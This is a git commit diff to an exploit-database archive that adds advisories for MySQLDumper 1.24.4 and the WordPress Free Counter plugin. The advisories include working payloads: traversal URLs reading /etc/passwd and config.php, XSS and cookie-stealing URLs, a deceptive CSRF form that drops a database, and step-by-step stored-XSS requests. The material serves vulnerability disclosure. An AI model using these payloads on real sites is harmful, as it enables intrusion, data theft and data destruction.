DB: 2015-05-28
9 new exploits
This commit is contained in:
parent
8a28155962
commit
c2a15a0750
11 changed files with 184 additions and 6 deletions
15
files.csv
15
files.csv
|
@ -78,7 +78,7 @@ id,file,description,date,author,platform,type,port
|
|||
77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
|
||||
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21
|
||||
79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
|
||||
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
|
||||
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
|
||||
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
|
||||
82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0
|
||||
83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
|
||||
|
@ -13780,7 +13780,7 @@ id,file,description,date,author,platform,type,port
|
|||
15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0
|
||||
15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0
|
||||
15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0
|
||||
15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,Skylined,windows,shellcode,0
|
||||
15879,platforms/windows/shellcode/15879.txt,"w32 speaking shellcode",2010-12-31,Skylined,windows,shellcode,0
|
||||
15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0
|
||||
15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0
|
||||
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
|
||||
|
@ -26885,7 +26885,7 @@ id,file,description,date,author,platform,type,port
|
|||
30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0
|
||||
30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0
|
||||
30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0
|
||||
30165,platforms/asp/webapps/30165.txt,Ibrahim,2007-06-08,ertuqrul,asp,webapps,0
|
||||
30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
|
||||
30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0
|
||||
30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0
|
||||
30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0
|
||||
|
@ -33504,3 +33504,12 @@ id,file,description,date,author,platform,type,port
|
|||
37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection Vulnerability",2012-04-28,eidelweiss,php,webapps,0
|
||||
37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting Vulnerability",2012-04-30,Am!r,php,webapps,0
|
||||
37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0
|
||||
37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0
|
||||
37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 sql.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0
|
||||
37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0
|
||||
37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0
|
||||
37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80
|
||||
37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
15
platforms/perl/webapps/37126.txt
Executable file
15
platforms/perl/webapps/37126.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00
|
15
platforms/php/webapps/37125.txt
Executable file
15
platforms/php/webapps/37125.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E
|
15
platforms/php/webapps/37127.txt
Executable file
15
platforms/php/webapps/37127.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
|
16
platforms/php/webapps/37128.txt
Executable file
16
platforms/php/webapps/37128.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
|
||||
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
|
16
platforms/php/webapps/37129.txt
Executable file
16
platforms/php/webapps/37129.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
|
||||
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
|
17
platforms/php/webapps/37130.txt
Executable file
17
platforms/php/webapps/37130.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/restore.php
|
||||
http://www.example.com/learn/cubemail/dump.php
|
||||
http://www.example.com/learn/cubemail/refresh_dblist.php
|
19
platforms/php/webapps/37131.txt
Executable file
19
platforms/php/webapps/37131.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
<img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" />
|
||||
<form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
|
||||
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
|
||||
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
|
||||
</form>
|
41
platforms/php/webapps/37132.txt
Executable file
41
platforms/php/webapps/37132.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: WordPress Free Counter Plugin [Stored XSS]
|
||||
# Date: 2015/05/25
|
||||
# Exploit Author: Panagiotis Vagenas
|
||||
# Contact: https://twitter.com/panVagenas
|
||||
# Vendor Homepage: http://www.free-counter.org
|
||||
# Software Link: https://wordpress.org/plugins/free-counter/
|
||||
# Version: 1.1
|
||||
# Tested on: WordPress 4.2.2
|
||||
# Category: webapps
|
||||
# CVE: CVE-2015-4084
|
||||
|
||||
1. Description
|
||||
|
||||
Any authenticated or non-authenticated user can perform a stored XSS
|
||||
attack simply by exploiting wp_ajax_nopriv_check_stat action.
|
||||
Plugin uses a widget to display website's visits, so any page that
|
||||
contains this widget will also load the malicious JS code.
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
* Send a post request to `http://www.free-counter.org/Api.php` in order
|
||||
to reveal the counter id of the vulnerable site. The POST data must
|
||||
contain the following vars:
|
||||
`action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
|
||||
* As a response we get a serialized indexed array. The value that we
|
||||
need to know is the 'counter_id'.
|
||||
* Send a post request to
|
||||
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
|
||||
`action=check_stat&id_counter=<counter_id from step
|
||||
2>&value_=<script>alert(1)</script>`
|
||||
* Visit a page of the infected website that displays plugin's widget.
|
||||
|
||||
Note that the plugin uses the update_option function to store the
|
||||
$_POST['value_'] contents to DB so any code inserted there will be
|
||||
escaped. Even though a malicious user can omit the quotes in the src
|
||||
attr of the script tag. Most modern browsers will treat the tag as they
|
||||
were there.
|
||||
|
||||
3. Solution
|
||||
|
||||
No official solution yet exists.
|
15
platforms/php/webapps/37133.txt
Executable file
15
platforms/php/webapps/37133.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53306/info
|
||||
|
||||
MySQLDumper is prone to multiple security vulnerabilities, including:
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities.
|
||||
2. A local file-include vulnerability.
|
||||
3. Multiple cross-site request-forgery vulnerabilities.
|
||||
4. Multiple information-disclosure vulnerabilities.
|
||||
5. A directory-traversal vulnerability.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
|
||||
|
||||
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;
|
|
@ -194,6 +194,6 @@ snd=send(sock, exploit_code, strlen(exploit_code) , 0);
|
|||
Sleep(2000);
|
||||
closesocket(sock);
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2003-08-13]
|
||||
}
|
||||
|
||||
// milw0rm.com [2003-08-13]
|
||||
|
|
Loading…
Add table
Reference in a new issue